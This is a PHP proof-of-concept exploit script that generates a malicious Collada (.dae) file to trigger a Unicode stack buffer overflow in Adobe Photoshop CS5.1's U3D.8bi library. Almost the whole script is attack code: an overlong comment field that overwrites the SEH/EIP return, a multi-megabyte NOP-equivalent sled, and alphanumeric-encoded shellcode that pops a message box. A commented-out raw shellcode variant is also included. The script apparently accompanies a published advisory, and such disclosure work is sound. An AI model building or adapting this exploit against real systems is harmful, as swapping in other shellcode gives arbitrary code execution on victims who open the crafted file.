<?php
// ~ Adobe Photoshop CS5.1 U3D.8bi Library Collada Asset Elements
// Unicode Conversion Stack Based Buffer Overflow poc (*.dae)//(32bit/SEH) ~
//// unicode overflow occurs when overlong asset elements are processed
// one could be able to return inside an ASCII memory region
// with an ultra large nop through assigning eip to ex. Photoshop.00630041.// the shellcode should be alphabetic (high bytes order filtering and various issues)//// Usage: php 9sg_dae.php
// a file photoshop_sample.dae is created
//start Photoshop then open it through the File menu
// a message box pops, HEY!
//// ~ rgod ~ - Advisory Reference: http://retrogod.altervista.org/9sg_photoshock_adv.htm
/*
you shuld change addresses according to your system
then reencode with alpha2 (use eax alignment)//say "Hey" MsgBox Shellcode
$code ="\x31\xc0\x31\xdb\x31\xc9\x31\xd2"."\xeb\x2a\x59"."\xbb\xca\x1d\xe4\x77".//LoadLibraryA(), kernel32.dll
"\x51\xff\xd3\xeb\x2f\x59\x51\x50"."\xbb\x7a\x3d\xe6\x77".//GetProcAddress(), kernel32.dll
"\xff\xd3\xeb"."\x34\x59\x31\xd2\x52\x51\x51\x52"."\xff\xd0\x31\xd2\x50"."\xb8\xf9\x68\xe6\x77".//ExitProcess(), kernel32.dll
"\xff\xd0\xe8\xd1\xff\xff"."\xff\x75\x73\x65\x72\x33\x32\x2e"."\x64\x6c\x6c\x00\xe8\xcc\xff\xff"."\xff\x4d\x65\x73\x73\x61\x67\x65"."\x42\x6f\x78\x41\x00\xe8\xc7\xff"."\xff\xff\x48\x65\x79\x00";*/$scode = "\x2d\x7d\x25\x5b\x7f".//sub preamble, align eax for alpha code,clean
"\x2d\x79\x22\x20\x6f".//sub, align ... the gap is repaired through the inc eax trick
"PYIIIIIIIIIIIIIIII7QZjA"."XP0A0AkAAQ2AB2BB0BBABXP"."8ABuJIvQYPp1IKp1YYtqJrZ"."K4jpYmk8JuMM4PwpQKOyCZK"."vORycaRpMksJUmkVqgyoKcz"."KvTRyTqZrRr0QrqPRkOn0VQ"."N20PnXzY0hZFpwYojpM8N1k"."OIokOQebSauPrP3trDnPdrL"."PlUPKXxLKOKOIorm1u2SRS3"."QQw0esrbOd8raC0KXKwkOYo"."KO3xSUt9uPA";$eip="Ac";//Photosho.00630041,return to our payload
$payload = str_repeat("\x40",4096000);//inc eax, needed , also nop equivalent, don't touch
$payload.=$scode;
$payload.= str_repeat("\x40",1024000);
$_xml ='<?xml version="1.0"?>'.
'<COLLADA xmlns="http://www.collada.org/2005/11/COLLADASchema" version="1.4.1">'.
'<asset>'.
'<contributor>'.
'<author>rgod</author>'.
'<authoring_tool>Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2</authoring_tool>'.
'<comments>Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;'.
'curveConstrainSampling=0;exportCameraAsLookat=0;'.
'exportLights=1;exportCameras=1;exportJointsAndSkin=1;'.
'exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;'.
'exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;'.
'exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;'.
'dereferenceXRefs=0;cameraXFov=0;'.
str_repeat("A",170).
'cameraYFov=1;'.
str_repeat("a",100).
str_repeat("b",100).
str_repeat("c",100).
str_repeat("d",100).
str_repeat("e",100).
str_repeat("f",100).
str_repeat("g",100).
str_repeat("h",100).
str_repeat("i",100).
str_repeat("j",100).
str_repeat("k",100).
str_repeat("l",100).
str_repeat("m",100).
str_repeat("n",100).
"aaaabbbA".
$eip.
"ccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyy".
'</comments>'.
'<aaaa>'.
$payload.
'</aaaa>'.
'<copyright>'.
'Copyright 2012 rgod Computer Entertainment Inc.'.
'</copyright>'.
'<source_data>file:///C:/vs2005/sample_data/untitled</source_data>'.
'</contributor>'.
'<created>2008-04-24T22:29:59Z</created>'.
'<modified>2099-02-21T22:52:44Z</modified>'.
'<unit meter="0.01" name="centimeter"/>'.
'<up_axis>Y_UP</up_axis>'.
'</asset>'.
'</COLLADA>';
file_put_contents("photoshop_sample.dae",$_xml);echo"done";
?>
